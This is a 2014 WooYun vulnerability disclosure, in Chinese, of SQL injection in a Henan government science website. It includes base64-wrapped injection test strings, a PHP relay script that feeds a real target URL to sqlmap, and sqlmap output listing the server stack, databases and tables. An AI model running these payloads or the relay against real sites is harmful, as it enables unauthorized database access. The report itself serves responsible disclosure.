当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070259

漏洞标题:河南科技网存在SQL注入

相关厂商:河南科技网

漏洞作者: 浮萍

提交时间:2014-07-30 11:08

修复时间:2014-09-13 11:10

公开时间:2014-09-13 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-30: 细节已通知厂商并且等待厂商处理中
2014-08-04: 厂商已经确认,细节仅向厂商公开
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-13: 细节向公众公开

简要描述:

详细说明:

河南科技网http://www.hnkjt.gov.cn/

Snap9.jpg


Snap10.jpg


dataId=MzQxNw== 经base64解密后为3417
3417'base64加密MzQxNyc=
页面不正常

Snap11.jpg


3417 and 1=1 加密 MzQxNyBhbmQgMT0x
页面正常

Snap12.jpg


爆字段

Snap13.jpg


爆数据库信息

Snap14.jpg


暴库

Snap15.jpg


这样爆表没爆出来
然后使用中转~~

漏洞证明:

<?php
header("Content-type: text/html; charset=gb2312");
set_time_limit(0);
$id=$_GET["id"];
$id = base64_encode($id);
$url = "http://www.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=".$id;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>


访问http://host/xx.php?id=3417
丢入sqlmap
系统信息

web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11


数据库

available databases [5]:
[*] cxqybak
[*] hnkjwdb_old
[*] hnsti_cn_db
[*] information_schema
[*] mysql


和爆出的数据库一样

Database: cxqybak
[188 tables]
+----------------+
| base_content |
| epdbconinfo |
| epdbfieldinfo |
| epdbfieldtype |
| epdbmoduleinfo |
| epdbphy1 |
| epdbphy10 |
| epdbphy100 |
| epdbphy101 |
| epdbphy102 |
| epdbphy103 |
| epdbphy106 |
| epdbphy107 |
| epdbphy108 |
| epdbphy109 |
| epdbphy11 |
| epdbphy110 |
| epdbphy111 |
| epdbphy112 |
| epdbphy113 |
| epdbphy120 |
| epdbphy121 |
| epdbphy122 |
| epdbphy123 |
| epdbphy124 |
| epdbphy125 |
| epdbphy126 |
| epdbphy127 |
| epdbphy13 |
| epdbphy137 |
| epdbphy138 |
| epdbphy14 |
| epdbphy140 |
| epdbphy141 |
| epdbphy142 |
| epdbphy143 |
| epdbphy144 |
| epdbphy145 |
| epdbphy146 |
| epdbphy147 |
| epdbphy148 |
| epdbphy149 |
| epdbphy15 |
| epdbphy150 |
| epdbphy151 |
| epdbphy152 |
| epdbphy153 |
| epdbphy154 |
| epdbphy155 |
| epdbphy156 |
| epdbphy157 |
| epdbphy158 |
| epdbphy159 |
| epdbphy16 |
| epdbphy160 |
| epdbphy161 |
| epdbphy162 |
| epdbphy163 |
| epdbphy164 |
| epdbphy165 |
| epdbphy166 |
| epdbphy167 |
| epdbphy168 |
| epdbphy169 |
| epdbphy17 |
| epdbphy170 |
| epdbphy171 |
| epdbphy172 |
| epdbphy173 |
| epdbphy174 |
| epdbphy175 |
| epdbphy176 |
| epdbphy18 |
| epdbphy186 |
| epdbphy187 |
| epdbphy188 |
| epdbphy189 |
| epdbphy19 |
| epdbphy191 |
| epdbphy192 |
| epdbphy193 |
| epdbphy194 |
| epdbphy196 |
| epdbphy197 |
| epdbphy198 |
| epdbphy199 |
| epdbphy2 |
| epdbphy20 |
| epdbphy200 |
| epdbphy201 |
| epdbphy202 |
| epdbphy205 |
| epdbphy206 |
| epdbphy207 |
| epdbphy208 |
| epdbphy209 |
| epdbphy21 |
| epdbphy213 |
| epdbphy216 |
| epdbphy217 |
| epdbphy218 |
| epdbphy219 |
| epdbphy22 |
| epdbphy220 |
| epdbphy221 |
| epdbphy222 |
| epdbphy223 |
| epdbphy224 |
| epdbphy225 |
| epdbphy226 |
| epdbphy227 |
| epdbphy228 |
| epdbphy23 |
| epdbphy24 |
| epdbphy25 |
| epdbphy26 |
| epdbphy27 |
| epdbphy28 |
| epdbphy29 |
| epdbphy3 |
| epdbphy30 |
| epdbphy35 |
| epdbphy36 |
| epdbphy37 |
| epdbphy38 |
| epdbphy39 |
| epdbphy4 |
| epdbphy40 |
| epdbphy41 |
| epdbphy42 |
| epdbphy43 |
| epdbphy44 |
| epdbphy45 |
| epdbphy46 |
| epdbphy47 |
| epdbphy48 |
| epdbphy5 |
| epdbphy50 |
| epdbphy51 |
| epdbphy52 |
| epdbphy53 |
| epdbphy54 |
| epdbphy55 |
| epdbphy56 |
| epdbphy58 |
| epdbphy59 |
| epdbphy60 |
| epdbphy61 |
| epdbphy64 |
| epdbphy66 |
| epdbphy67 |
| epdbphy68 |
| epdbphy69 |
| epdbphy70 |
| epdbphy71 |
| epdbphy72 |
| epdbphy73 |
| epdbphy74 |
| epdbphy75 |
| epdbphy76 |
| epdbphy77 |
| epdbphy78 |
| epdbphy79 |
| epdbphy80 |
| epdbphy81 |
| epdbphy82 |
| epdbphy84 |
| epdbphy85 |
| epdbphy86 |
| epdbphy87 |
| epdbphy88 |
| epdbphy89 |
| epdbphy9 |
| epdbphy90 |
| epdbphy91 |
| epdbphy92 |
| epdbphy93 |
| epdbphy94 |
| epdbphy96 |
| epdbphy97 |
| epdbphy98 |
| epdbphy99 |
| epdbstandright |
| epdbsysinfo |
| ip_0_194 |
| ip_195_217 |
| ip_218_218 |
| ip_219_255 |
+----------------+


Database: hnsti_cn_db
[86 tables]


Database: hnkjwdb_old
[190 tables]


修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-04 09:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心处置。

最新状态:

暂无